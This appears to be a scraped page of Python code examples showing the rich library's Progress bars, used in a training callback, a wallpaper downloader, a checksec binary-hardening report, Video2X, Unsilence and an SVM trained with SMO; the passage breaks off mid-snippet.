    def _update_metrics(self, trainer, pl_module) -> None:
        metrics = self.get_metrics(trainer, pl_module)
        metrics.pop('loss', None)
        metrics.pop('val_metric', None)
        if self._metric_component:
            self._metric_component.update(metrics)

    def teardown(self,
                 trainer,
                 pl_module,
                 stage: Optional[str] = None) -> None:
        self._stop_progress()

    def on_exception(self, trainer, pl_module,
                     exception: BaseException) -> None:
        self._stop_progress()

    @property
    def val_progress_bar(self) -> Task:
        return self.progress.tasks[self.val_progress_bar_id]

    @property
    def val_sanity_check_bar(self) -> Task:
        return self.progress.tasks[self.val_sanity_progress_bar_id]

    @property
    def main_progress_bar(self) -> Task:
        return self.progress.tasks[self.main_progress_bar_id]

    @property
    def test_progress_bar(self) -> Task:
        return self.progress.tasks[self.test_progress_bar_id]

    def configure_columns(self, trainer) -> list:
        return [
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            TimeRemainingColumn(),
            TimeElapsedColumn()
        ]
Code Example #17
def fit(epochs: int,
        lr: float,
        model: nn.Module,
        loss_fn,
        opt,
        train_dl,
        val_dl,
        debug_run: bool = False,
        debug_num_batches: int = 5):
    model.to(device)
    opt = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9)
    # mb = master_bar(range(epochs))
    progress_bar = Progress()

    # mb.write(['epoch', 'train_loss', 'val loss', 'time', 'train time', 'val_time'], table=True)
    progress_bar.start()
    header = [
        'epoch', 'train_loss', 'val loss', 'time', 'train time', 'val_time'
    ]  # , 'val_time', 'train_time']
    progress_bar.print(' '.join([f"{value:>9}" for value in header]))
    main_job = progress_bar.add_task('fit...', total=epochs)
    # for epoch in mb:
    for epoch in range(epochs):
        progress_bar.update(main_job, description=f"ep {epoch + 1} of {epochs}")
        # mb.main_bar.comment = f"ep {epoch + 1} of {epochs}"

        model.train()
        start_time = time.time()
        # for batch_num, batch in enumerate(progress_bar(train_dl, parent=mb)):
        len_train_dl = len(train_dl)
        train_job = progress_bar.add_task('train', total=len_train_dl)
        for batch_num, batch in enumerate(train_dl):
            progress_bar.update(train_job,
                                description=f"batch {batch_num}/{len_train_dl}")
            if debug_run and batch_num == debug_num_batches:
                break
            loss = loss_batch(model, loss_fn, batch)
            # mb.child.comment = f"loss {loss:0.4f}"
            loss.backward()
            opt.step()
            opt.zero_grad()
            progress_bar.update(train_job, advance=1)
        train_time = time.time() - start_time
        model.eval()
        len_val_dl = len(val_dl)
        val_job = progress_bar.add_task('validate...', total=len_val_dl)
        with torch.no_grad():
            valid_loss = []
            # for batch_num, batch in enumerate(progress_bar(val_dl, parent=mb)):
            for batch_num, batch in enumerate(val_dl):
                if debug_run and batch_num == debug_num_batches:
                    break
                valid_loss.append(loss_batch(model, loss_fn, batch).item())
                progress_bar.update(val_job, advance=1)  # advance per validation batch
            valid_loss = sum(valid_loss)
        epoch_time = time.time() - start_time
        # mb.write([str(epoch + 1), f'{loss:0.4f}', f'{valid_loss / len(val_dl):0.4f}',
        #          format_time(epoch_time), format_time(train_time), format_time(epoch_time - train_time)], table=True)
        to_progress_bar = [
            f"{epoch + 1}", f"{loss:0.4f}", f"{valid_loss:0.4f}",
            f"{format_time(epoch_time)}", f"{format_time(train_time)}"
        ]  # , f"{format_time(val_time)}"]
        progress_bar.print(' '.join(
            [f"{value:>9}" for value in to_progress_bar]))
        progress_bar.update(main_job, advance=1)
        progress_bar.remove_task(train_job)
        progress_bar.remove_task(val_job)

    progress_bar.remove_task(main_job)
    progress_bar.stop()
Code Example #18
class WallHaven(object):
    def __init__(self) -> None:
        self.base_url = "https://wallhaven.cc/search?q=like%3Arddgwm&page="
        self.progress = Progress()

    async def get_list_image_page(self, session: ClientSession,
                                  url: str) -> None:
        """获取图片列表页"""
        try:
            async with session.get(url) as resp:
                if resp.status == 200:
                    html = await resp.text(encoding="utf8")
                    if html:
                        await self.parse_image_link(session, html)
                    return
                return
        except ClientResponseError:
            return

    async def parse_image_link(self, session: ClientSession,
                               html: str) -> None:
        """解析列表页小图链接"""
        element = etree.HTML(html)
        links = element.xpath('//img[@alt="loading"]/@data-src')
        for image_link in links:
            image_link = await self.image_link_process(image_link)
            await self.download_image(session, image_link)

    @staticmethod
    async def image_link_process(image_link: str) -> str:
        """转换图片链接"""
        if "small" in image_link:
            image_link = image_link.replace("th", "w")
            image_link = image_link.replace("small", "full")
            url_path = image_link.split("/")
            url_path[-1] = f"wallhaven-{url_path[-1]}"
            image_link = "/".join(url_path)
            return image_link

    async def download_image(self, session: ClientSession,
                             image_link: str) -> None:
        """下载图片"""
        async with session.get(image_link) as resp:
            try:
                # total length of the image in bytes
                file_size = int(resp.headers['content-length'])
                if resp.status == 200:
                    file_name = image_link.split("/")[-1]
                    async with aiofiles.open(file=f"images/{file_name}",
                                             mode="ab") as f:
                        self.progress.start()
                        task = self.progress.add_task(
                            f'[red]Downloading...{file_name}', total=file_size)
                        while True:
                            chunk = await resp.content.read(1024)
                            if not chunk:
                                break
                            await f.write(chunk)
                            self.progress.update(task, advance=len(chunk))
                        self.progress.stop()
            except Exception:
                return

    async def run(self):
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
        }
        # limit the maximum number of connections
        async with aiohttp.TCPConnector(
            limit=200,
            force_close=True,
            enable_cleanup_closed=True,
        ) as tc:
            # create the session object
            async with ClientSession(connector=tc, headers=headers) as session:
                urls = [f"{self.base_url}{i}" for i in range(1, 9)]
                # create the download tasks
                tasks = [
                    asyncio.ensure_future(
                        self.get_list_image_page(session, url)) for url in urls
                ]
                # wait for all tasks to finish
                await asyncio.gather(*tasks)
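To actually run this crawler, one would create the images directory and drive the coroutine with asyncio; a short sketch of an entry point:

# Hypothetical entry point for the WallHaven class above.
import asyncio
import os

if __name__ == "__main__":
    os.makedirs("images", exist_ok=True)
    asyncio.run(WallHaven().run())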
Code Example #19
class RichOutput(AbstractChecksecOutput):
    def __init__(self, libc_detected: bool = False):
        """Init Rich Console and Table"""
        super().__init__(libc_detected)
        # init ELF table
        self.table_elf = Table(title="Checksec Results: ELF", expand=True)
        self.table_elf.add_column("File", justify="left", header_style="")
        self.table_elf.add_column("NX", justify="center")
        self.table_elf.add_column("PIE", justify="center")
        self.table_elf.add_column("Canary", justify="center")
        self.table_elf.add_column("Relro", justify="center")
        self.table_elf.add_column("RPATH", justify="center")
        self.table_elf.add_column("RUNPATH", justify="center")
        self.table_elf.add_column("Symbols", justify="center")
        if self._libc_detected:
            self.table_elf.add_column("FORTIFY", justify="center")
            self.table_elf.add_column("Fortified", justify="center")
            self.table_elf.add_column("Fortifiable", justify="center")
            self.table_elf.add_column("Fortify Score", justify="center")

        # init PE table
        self.table_pe = Table(title="Checksec Results: PE", expand=True)
        self.table_pe.add_column("File", justify="left", header_style="")
        self.table_pe.add_column("NX", justify="center")
        self.table_pe.add_column("Canary", justify="center")
        self.table_pe.add_column("ASLR", justify="center")
        self.table_pe.add_column("Dynamic Base", justify="center")
        self.table_pe.add_column("High Entropy VA", justify="center")
        self.table_pe.add_column("SEH", justify="center")
        self.table_pe.add_column("SafeSEH", justify="center")
        self.table_pe.add_column("Force Integrity", justify="center")
        self.table_pe.add_column("Control Flow Guard", justify="center")
        self.table_pe.add_column("Isolation", justify="center")
        self.table_pe.add_column("Authenticode", justify="center")

        # init console
        self.console = Console()

        # build progress bar
        self.process_bar = Progress(
            TextColumn("[bold blue]Processing...", justify="left"),
            BarColumn(bar_width=None),
            "{task.completed}/{task.total}",
            "•",
            "[progress.percentage]{task.percentage:>3.1f}%",
            console=self.console,
        )
        self.display_res_bar = Progress(
            BarColumn(bar_width=None),
            TextColumn("[bold blue]{task.description}", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )
        self.enumerate_bar = Progress(
            TextColumn("[bold blue]Enumerating...", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )

        self.process_task_id = None

    def __exit__(self, exc_type, exc_val, exc_tb):
        # cleanup the Rich progress bars
        if self.enumerate_bar is not None:
            self.enumerate_bar.stop()
        if self.process_bar is not None:
            self.process_bar.stop()
        if self.display_res_bar is not None:
            self.display_res_bar.stop()

    def enumerating_tasks_start(self):
        # start progress bar
        self.enumerate_bar.start()
        self.enumerate_bar.add_task("Enumerating", start=False)

    def enumerating_tasks_stop(self, total: int):
        super().enumerating_tasks_stop(total)
        self.enumerate_bar.stop()
        self.enumerate_bar = None

    def processing_tasks_start(self):
        # init progress bar
        self.process_bar.start()
        self.process_task_id = self.process_bar.add_task("Checking",
                                                         total=self.total)

    def add_checksec_result(self, filepath: Path,
                            checksec: Union[ELFChecksecData, PEChecksecData]):
        logging.debug("result for %s: %s", filepath, checksec)
        if isinstance(checksec, ELFChecksecData):
            row_res: List[str] = []
            # display results
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"
            row_res.append(nx_res)

            pie = checksec.pie
            if pie == PIEType.No:
                pie_res = f"[red]{pie.name}"
            elif pie == PIEType.DSO:
                pie_res = f"[yellow]{pie.name}"
            else:
                pie_res = "[green]Yes"
            row_res.append(pie_res)

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"
            row_res.append(canary_res)

            relro = checksec.relro
            if relro == RelroType.No:
                relro_res = f"[red]{relro.name}"
            elif relro == RelroType.Partial:
                relro_res = f"[yellow]{relro.name}"
            else:
                relro_res = f"[green]{relro.name}"
            row_res.append(relro_res)

            if checksec.rpath:
                rpath_res = "[red]Yes"
            else:
                rpath_res = "[green]No"
            row_res.append(rpath_res)

            if checksec.runpath:
                runpath_res = "[red]Yes"
            else:
                runpath_res = "[green]No"
            row_res.append(runpath_res)

            if checksec.symbols:
                symbols_res = "[red]Yes"
            else:
                symbols_res = "[green]No"
            row_res.append(symbols_res)

            # fortify results depend on having a Libc available
            if self._libc_detected:
                fortified_count = checksec.fortified
                if checksec.fortify_source:
                    fortify_source_res = "[green]Yes"
                else:
                    fortify_source_res = "[red]No"
                row_res.append(fortify_source_res)

                if fortified_count == 0:
                    fortified_res = "[red]No"
                else:
                    fortified_res = f"[green]{fortified_count}"
                row_res.append(fortified_res)

                fortifiable_count = checksec.fortifiable
                if fortified_count == 0:
                    fortifiable_res = "[red]No"
                else:
                    fortifiable_res = f"[green]{fortifiable_count}"
                row_res.append(fortifiable_res)

                if checksec.fortify_score == 0:
                    fortified_score_res = f"[red]{checksec.fortify_score}"
                elif checksec.fortify_score == 100:
                    fortified_score_res = f"[green]{checksec.fortify_score}"
                else:
                    fortified_score_res = f"[yellow]{checksec.fortify_score}"
                row_res.append(fortified_score_res)

            self.table_elf.add_row(str(filepath), *row_res)
        elif isinstance(checksec, PEChecksecData):
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            if not checksec.aslr:
                aslr_res = "[red]No"
            else:
                aslr_res = "[green]Yes"

            if not checksec.dynamic_base:
                dynamic_base_res = "[red]No"
            else:
                dynamic_base_res = "[green]Yes"

            # this is only relevant if the binary is 64 bits
            if checksec.machine == MACHINE_TYPES.AMD64:
                if not checksec.high_entropy_va:
                    entropy_va_res = "[red]No"
                else:
                    entropy_va_res = "[green]Yes"
            else:
                entropy_va_res = "/"

            if not checksec.seh:
                seh_res = "[red]No"
            else:
                seh_res = "[green]Yes"

            # only relevant if 32 bits
            if checksec.machine == MACHINE_TYPES.I386:
                if not checksec.safe_seh:
                    safe_seh_res = "[red]No"
                else:
                    safe_seh_res = "[green]Yes"
            else:
                safe_seh_res = "/"

            if not checksec.authenticode:
                auth_res = "[red]No"
            else:
                auth_res = "[green]Yes"

            if not checksec.force_integrity:
                force_integrity_res = "[red]No"
            else:
                force_integrity_res = "[green]Yes"

            if not checksec.guard_cf:
                guard_cf_res = "[red]No"
            else:
                guard_cf_res = "[green]Yes"

            if not checksec.isolation:
                isolation_res = "[red]No"
            else:
                isolation_res = "[green]Yes"

            self.table_pe.add_row(
                str(filepath),
                nx_res,
                canary_res,
                aslr_res,
                dynamic_base_res,
                entropy_va_res,
                seh_res,
                safe_seh_res,
                force_integrity_res,
                guard_cf_res,
                isolation_res,
                auth_res,
            )
        else:
            raise NotImplementedError

    def checksec_result_end(self):
        """Update progress bar"""
        self.process_bar.update(self.process_task_id, advance=1)

    def print(self):
        self.process_bar.stop()
        self.process_bar = None

        if self.table_elf.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: ELF ...", start=False)
                self.console.print(self.table_elf)
                self.display_res_bar.remove_task(task_id)
        if self.table_pe.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: PE ...", start=False)
                self.console.print(self.table_pe)
                self.display_res_bar.remove_task(task_id)

        self.display_res_bar.stop()
        self.display_res_bar = None
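
Note: the methods above reference self.table_elf, self.table_pe, self.process_bar, and self.display_res_bar, but their construction is not part of this snippet. The following is a minimal sketch, not the project's actual constructor, of how those rich objects might be initialized; the class name, column lists, and task descriptions are assumptions.

from rich.console import Console
from rich.progress import BarColumn, Progress
from rich.table import Table


class RichOutput:  # hypothetical constructor for the methods shown above
    def __init__(self, total_files: int):
        self.console = Console()

        # result tables filled in by checksec_result(); column lists are guesses
        self.table_elf = Table(title="Checksec Results: ELF")
        for column in ("File", "NX", "Canary", "Fortified", "Fortifiable",
                       "Fortify Score"):
            self.table_elf.add_column(column)

        self.table_pe = Table(title="Checksec Results: PE")
        for column in ("File", "NX", "Canary", "ASLR", "Dynamic Base",
                       "High Entropy VA", "SEH", "SafeSEH", "Force Integrity",
                       "Guard CF", "Isolation", "Authenticode"):
            self.table_pe.add_column(column)

        # progress bar advanced once per file by checksec_result_end()
        self.process_bar = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "{task.completed}/{task.total}",
            console=self.console,
        )
        self.process_bar.start()
        self.process_task_id = self.process_bar.add_task(
            "Checking files...", total=total_files)

        # indeterminate bar shown by print() while the large tables render
        self.display_res_bar = Progress(
            "[progress.description]{task.description}", console=self.console)
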
コード例 #20
0
class Video2X:
    """
    Video2X class

    provides two vital functions:
        - upscale: perform upscaling on a file
        - interpolate: perform motion interpolation on a file
    """

    def __init__(self) -> None:
        self.version = __version__

    def _get_video_info(self, path: pathlib.Path) -> tuple:
        """
        get video file information with FFmpeg

        :param path pathlib.Path: video file path
        :raises RuntimeError: raised when video stream isn't found
        :return: video width, height, total frame count, and frame rate
        """
        # probe video file info
        logger.info("Reading input video information")
        for stream in ffmpeg.probe(path)["streams"]:
            if stream["codec_type"] == "video":
                video_info = stream
                break
        else:
            raise RuntimeError("unable to find video stream")

        # get total number of frames to be processed
        capture = cv2.VideoCapture(str(path))

        # check if file is opened successfully
        if not capture.isOpened():
            raise RuntimeError("OpenCV has failed to open the input file")

        total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
        frame_rate = capture.get(cv2.CAP_PROP_FPS)

        return video_info["width"], video_info["height"], total_frames, frame_rate

    def _toggle_pause(self, _signal_number: int = -1, _frame=None):
        # print console messages and update the progress bar's status
        if self.pause.value is False:
            self.progress.update(self.task, description=self.description + " (paused)")
            self.progress.stop_task(self.task)
            logger.warning("Processing paused, press Ctrl+Alt+V again to resume")

        elif self.pause.value is True:
            self.progress.update(self.task, description=self.description)
            logger.warning("Resuming processing")
            self.progress.start_task(self.task)

        # invert the value of the pause flag
        with self.pause.get_lock():
            self.pause.value = not self.pause.value

    def _run(
        self,
        input_path: pathlib.Path,
        width: int,
        height: int,
        total_frames: int,
        frame_rate: float,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        Processor: object,
        mode: str,
        processes: int,
        processing_settings: tuple,
    ) -> None:

        # record original STDOUT and STDERR for restoration
        original_stdout = sys.stdout
        original_stderr = sys.stderr

        # create console for rich's Live display
        console = Console()

        # redirect STDOUT and STDERR to console
        sys.stdout = FileProxy(console, sys.stdout)
        sys.stderr = FileProxy(console, sys.stderr)

        # re-add Loguru to point to the new STDERR
        logger.remove()
        logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

        # initialize values
        self.processor_processes = []
        self.processing_queue = multiprocessing.Queue(maxsize=processes * 10)
        processed_frames = multiprocessing.Manager().list([None] * total_frames)
        self.processed = multiprocessing.Value("I", 0)
        self.pause = multiprocessing.Value(ctypes.c_bool, False)

        # set up and start decoder thread
        logger.info("Starting video decoder")
        self.decoder = VideoDecoder(
            input_path,
            width,
            height,
            frame_rate,
            self.processing_queue,
            processing_settings,
            self.pause,
        )
        self.decoder.start()

        # set up and start encoder thread
        logger.info("Starting video encoder")
        self.encoder = VideoEncoder(
            input_path,
            frame_rate * 2 if mode == "interpolate" else frame_rate,
            output_path,
            output_width,
            output_height,
            total_frames,
            processed_frames,
            self.processed,
            self.pause,
        )
        self.encoder.start()

        # create processor processes
        for process_name in range(processes):
            process = Processor(self.processing_queue, processed_frames, self.pause)
            process.name = str(process_name)
            process.daemon = True
            process.start()
            self.processor_processes.append(process)

        # create progress bar
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(complete_style="blue", finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[color(240)]({task.completed}/{task.total})",
            ProcessingSpeedColumn(),
            TimeElapsedColumn(),
            "<",
            TimeRemainingColumn(),
            console=console,
            speed_estimate_period=300.0,
            disable=True,
        )

        self.description = f"[cyan]{MODE_LABELS.get(mode, 'Unknown')}"
        self.task = self.progress.add_task(self.description, total=total_frames)

        # allow sending SIGUSR1 to pause/resume processing
        signal.signal(signal.SIGUSR1, self._toggle_pause)

        # enable global pause hotkey if it's supported
        if ENABLE_HOTKEY is True:

            # create global pause hotkey
            pause_hotkey = pynput.keyboard.HotKey(
                pynput.keyboard.HotKey.parse("<ctrl>+<alt>+v"), self._toggle_pause
            )

            # create global keyboard input listener
            keyboard_listener = pynput.keyboard.Listener(
                on_press=(
                    lambda key: pause_hotkey.press(keyboard_listener.canonical(key))
                ),
                on_release=(
                    lambda key: pause_hotkey.release(keyboard_listener.canonical(key))
                ),
            )

            # start monitoring global key presses
            keyboard_listener.start()

        # a temporary variable that stores the exception
        exception = []

        try:

            # wait for jobs in queue to deplete
            while self.processed.value < total_frames - 1:
                time.sleep(1)

                # check processor health
                for process in self.processor_processes:
                    if not process.is_alive():
                        raise Exception("process died unexpectedly")

                # check decoder health
                if not self.decoder.is_alive() and self.decoder.exception is not None:
                    raise Exception("decoder died unexpectedly")

                # check encoder health
                if not self.encoder.is_alive() and self.encoder.exception is not None:
                    raise Exception("encoder died unexpectedly")

                # show progress bar when upscale starts
                if self.progress.disable is True and self.processed.value > 0:
                    self.progress.disable = False
                    self.progress.start()

                # update progress
                if self.pause.value is False:
                    self.progress.update(self.task, completed=self.processed.value)

            self.progress.update(self.task, completed=total_frames)
            self.progress.stop()
            logger.info("Processing has completed")

        # if SIGTERM is received or ^C is pressed
        # TODO: pause and continue here
        except (SystemExit, KeyboardInterrupt) as e:
            self.progress.stop()
            logger.warning("Exit signal received, exiting gracefully")
            logger.warning("Press ^C again to force terminate")
            exception.append(e)

        except Exception as e:
            self.progress.stop()
            logger.exception(e)
            exception.append(e)

        finally:

            # stop keyboard listener
            if ENABLE_HOTKEY is True:
                keyboard_listener.stop()
                keyboard_listener.join()

            # stop progress display
            self.progress.stop()

            # stop processor processes
            logger.info("Stopping processor processes")
            for process in self.processor_processes:
                process.terminate()

            # wait for processes to finish
            for process in self.processor_processes:
                process.join()

            # stop encoder and decoder
            logger.info("Stopping decoder and encoder threads")
            self.decoder.stop()
            self.encoder.stop()
            self.decoder.join()
            self.encoder.join()

            # mark processing queue as closed
            self.processing_queue.close()

            # raise the error if there is any
            if len(exception) > 0:
                raise exception[0]

            # restore original STDOUT and STDERR
            sys.stdout = original_stdout
            sys.stderr = original_stderr

            # re-add Loguru to point to the restored STDERR
            logger.remove()
            logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

    def upscale(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        noise: int,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get basic video information
        width, height, total_frames, frame_rate = self._get_video_info(input_path)

        # automatically calculate output width and height if only one is given
        if output_width == 0 or output_width is None:
            output_width = output_height / height * width

        elif output_height == 0 or output_height is None:
            output_height = output_width / width * height

        # sanitize output width and height to be divisible by 2
        output_width = int(math.ceil(output_width / 2.0) * 2)
        output_height = int(math.ceil(output_height / 2.0) * 2)

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            output_width,
            output_height,
            Upscaler,
            "upscale",
            processes,
            (
                output_width,
                output_height,
                noise,
                threshold,
                algorithm,
            ),
        )

    def interpolate(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get video basic information
        width, height, original_frames, frame_rate = self._get_video_info(input_path)

        # calculate the number of total output frames
        total_frames = original_frames * 2 - 1

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            width,
            height,
            Interpolator,
            "interpolate",
            processes,
            (threshold, algorithm),
        )
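
A hypothetical usage sketch of the Video2X class above, based only on the method signatures shown here; the file paths, sizes, process counts, and algorithm names are placeholders rather than documented defaults.

import pathlib

video2x = Video2X()

# upscale a clip to 4K with two processor processes (placeholder values)
video2x.upscale(
    input_path=pathlib.Path("input.mp4"),
    output_path=pathlib.Path("output.mp4"),
    output_width=3840,
    output_height=2160,
    noise=3,
    processes=2,
    threshold=0.0,
    algorithm="waifu2x",  # assumed algorithm name
)

# double the frame rate of the same clip (placeholder values)
video2x.interpolate(
    input_path=pathlib.Path("input.mp4"),
    output_path=pathlib.Path("interpolated.mp4"),
    processes=2,
    threshold=5.0,
    algorithm="rife",  # assumed algorithm name
)
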
コード例 #21
0
def run():
    """
    Run the Console Interface for Unsilence
    :return: None
    """
    sys.tracebacklimit = 0

    args = parse_arguments()
    console = Console()

    if args.debug:
        sys.tracebacklimit = 1000

    if args.output_file.exists() and not args.non_interactive_mode:
        if not choice_dialog(
                console, "File already exists. Overwrite?", default=False):
            return

    args_dict = vars(args)

    argument_list_for_silence_detect = [
        "silence_level", "silence_time_threshold", "short_interval_threshold",
        "stretch_time"
    ]

    argument_dict_for_silence_detect = {
        key: args_dict[key]
        for key in argument_list_for_silence_detect if key in args_dict.keys()
    }

    argument_list_for_renderer = [
        "audio_only", "audible_speed", "silent_speed", "audible_volume",
        "silent_volume", "drop_corrupted_intervals", "threads"
    ]

    argument_dict_for_renderer = {
        key: args_dict[key]
        for key in argument_list_for_renderer if key in args_dict.keys()
    }

    progress = Progress()

    continual = Unsilence(args.input_file)

    with progress:

        def update_task(current_task):
            def handler(current_val, total):
                progress.update(current_task,
                                total=total,
                                completed=current_val)

            return handler

        silence_detect_task = progress.add_task("Calculating Intervals...",
                                                total=1)

        continual.detect_silence(
            on_silence_detect_progress_update=update_task(silence_detect_task),
            **argument_dict_for_silence_detect)

        progress.stop()
        progress.remove_task(silence_detect_task)

        print()

        estimated_time = continual.estimate_time(args.audible_speed,
                                                 args.silent_speed)
        console.print(pretty_time_estimate(estimated_time))

        print()

        if not args.non_interactive_mode:
            if not choice_dialog(
                    console, "Continue with these options?", default=True):
                return

        progress.start()
        rendering_task = progress.add_task("Rendering Intervals...", total=1)
        concat_task = progress.add_task("Combining Intervals...", total=1)

        continual.render_media(
            args.output_file,
            on_render_progress_update=update_task(rendering_task),
            on_concat_progress_update=update_task(concat_task),
            **argument_dict_for_renderer)

        progress.stop()

    console.print("\n[green]Finished![/green] :tada:")
    print()
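
The update_task closure above is a small adapter that turns a (current, total) progress callback into updates on a rich task. Below is a stand-alone sketch of the same pattern, with a dummy worker standing in for unsilence.

import time

from rich.progress import Progress


def make_progress_handler(progress: Progress, task_id):
    """Return a (current, total) callback that drives a rich task."""
    def handler(current_val, total):
        progress.update(task_id, total=total, completed=current_val)
    return handler


def fake_worker(on_progress, steps=50):
    """Dummy stand-in for a long-running job that reports progress."""
    for i in range(steps):
        time.sleep(0.02)
        on_progress(i + 1, steps)


with Progress() as progress:
    task = progress.add_task("Working...", total=1)
    fake_worker(on_progress=make_progress_handler(progress, task))
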
コード例 #22
0
class TimeLoop:
    """
    A special iterator that will iterate for a specified duration of time.

    Uses a progress meter to show the user how much time is left.
    Each iteration of the time-loop produces a tick.
    """

    advent: Optional[pendulum.DateTime]
    moment: Optional[pendulum.DateTime]
    last_moment: Optional[pendulum.DateTime]
    counter: int
    progress: Optional[Progress]
    duration: pendulum.Duration
    message: str
    color: str

    def __init__(
        self,
        duration: Union[pendulum.Duration, int],
        message: str = "Processing",
        color: str = "green",
    ):
        """
        Initialize the time-loop.

        Duration may be either a count of seconds or a ``pendulum.duration``.
        """
        self.moment = None
        self.last_moment = None
        self.counter = 0
        self.progress = None
        if isinstance(duration, int):
            JobbergateCliError.require_condition(
                duration > 0, "The duration must be a positive integer")
            self.duration = pendulum.duration(seconds=duration)
        else:
            self.duration = duration
        self.message = message
        self.color = color

    def __del__(self):
        """
        Explicitly clear the progress meter if the time-loop is destroyed.
        """
        self.clear()

    def __iter__(self) -> "TimeLoop":
        """
        Start the iterator.

        Creates and starts the progress meter
        """
        self.advent = self.last_moment = self.moment = pendulum.now()
        self.counter = 0
        self.progress = Progress()
        self.progress.add_task(
            f"[{self.color}]{self.message}...",
            total=self.duration.total_seconds(),
        )
        self.progress.start()
        return self

    def __next__(self) -> Tick:
        """
        Iterates the time loop and returns a tick.

        If the duration is complete, clear the progress meter and stop iteration.
        """
        # Keep mypy happy
        assert self.progress is not None

        self.counter += 1
        self.last_moment = self.moment
        self.moment: pendulum.DateTime = pendulum.now()
        elapsed: pendulum.Duration = self.moment - self.last_moment
        total_elapsed: pendulum.Duration = self.moment - self.advent

        for task_id in self.progress.task_ids:
            self.progress.advance(task_id, elapsed.total_seconds())

        if self.progress.finished:
            self.clear()
            raise StopIteration

        return Tick(
            counter=self.counter,
            elapsed=elapsed,
            total_elapsed=total_elapsed,
        )

    def clear(self):
        """
        Clear the time-loop.

        Stops the progress meter (if it is set) and reset moments, counter, progress meter.
        """
        if self.progress is not None:
            self.progress.stop()
        self.counter = 0
        self.progress = None
        self.moment = None
        self.last_moment = None
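
A hypothetical usage of TimeLoop: poll a condition for up to 30 seconds while the progress meter shows how much of the window has elapsed. The job_is_done helper is a placeholder, not part of the class above.

import time


def job_is_done() -> bool:
    return False  # placeholder condition


for tick in TimeLoop(30, message="Waiting for job", color="cyan"):
    if job_is_done():
        break
    time.sleep(1)  # check once per second; each pass produces one Tick
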
コード例 #23
0
    def train(self, trainData, trainLabel):
        '''
        Train the model
        ===============
        Arguments
        ---------
        - `trainData` training set data
        - `trainLabel` training set labels

        Algorithm
        ---------
        - Sequential minimal optimization (SMO)

        Returns
        -------
        '''
        self.__x, self.__y = np.array(trainData), np.array(trainLabel)
        self.__alpha = np.zeros(self.__x.shape[0])
        self.__b = 0
        self.__K = np.zeros([self.__x.shape[0], self.__x.shape[0]],
                            dtype=float)  # kernel matrix of the training data

        for i in range(self.__x.shape[0]):
            for j in range(i, self.__x.shape[0]):
                self.__K[i, j] = self.__K[j, i] = self.Kernel(
                    self.__x[i], self.__x[j])  # compute the kernel matrix

        progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(bar_width=None),
            "[progress.percentage]{task.completed}/{task.total}",
            "•",
            "[time]{task.elapsed:.2f}s",
        )  # rich progress bar
        progress.start()

        allSatisfied = False  # whether all samples satisfy the KKT conditions
        iteration = 1  # iteration counter
        while not allSatisfied:
            allSatisfied = True
            iterateTask = progress.add_task(
                "[yellow]{} iterating...".format(iteration),
                total=self.__x.shape[0])
            iteration += 1
            for i in range(self.__x.shape[0]):  # outer loop
                progress.update(iterateTask, advance=1)
                if not (self.__ifSatisfyKKT(i)):  # select the first variable
                    E1 = self.__Error(i)
                    maximum = -1
                    for k in range(self.__x.shape[0]):  # inner loop
                        tempE = self.__Error(k)
                        tempE_difference = np.fabs(E1 - tempE)
                        if tempE_difference > maximum:  # select the second variable
                            maximum = tempE_difference
                            E2 = tempE
                            j = k
                    if maximum == -1:
                        continue

                    U = max(0, (self.__alpha[i] + self.__alpha[j] -
                                self.__C) if self.__y[i] == self.__y[j] else
                            (self.__alpha[j] -
                             self.__alpha[i]))  # lower bound of alpha_2_new
                    V = min(
                        self.__C,
                        (self.__alpha[i] +
                         self.__alpha[j]) if self.__y[i] == self.__y[j] else
                        (self.__alpha[j] - self.__alpha[i] +
                         self.__C))  # upper bound of alpha_2_new
                    alpha_2_new = self.__alpha[j] + self.__y[j] * (E1 - E2) / (
                        self.__K[i, i] + self.__K[j, j] - 2 * self.__K[i, j])

                    # clip alpha_2_new to the interval [U, V]
                    if alpha_2_new > V:
                        alpha_2_new = V
                    elif alpha_2_new < U:
                        alpha_2_new = U

                    alpha_1_new = self.__alpha[i] + self.__y[i] * \
                        self.__y[j] * (self.__alpha[j] - alpha_2_new)

                    # update the bias
                    b_1_new = -E1 - self.__y[i] * self.__K[i, i] * (
                        alpha_1_new -
                        self.__alpha[i]) - self.__y[j] * self.__K[j, i] * (
                            alpha_2_new - self.__alpha[j]) + self.__b
                    b_2_new = -E2 - self.__y[i] * self.__K[i, j] * (
                        alpha_1_new -
                        self.__alpha[i]) - self.__y[j] * self.__K[j, j] * (
                            alpha_2_new - self.__alpha[j]) + self.__b

                    # apply the updates
                    if (np.fabs(self.__alpha[i] - alpha_1_new) <
                            0.0000001) and (np.fabs(self.__alpha[j] -
                                                    alpha_2_new) < 0.0000001):
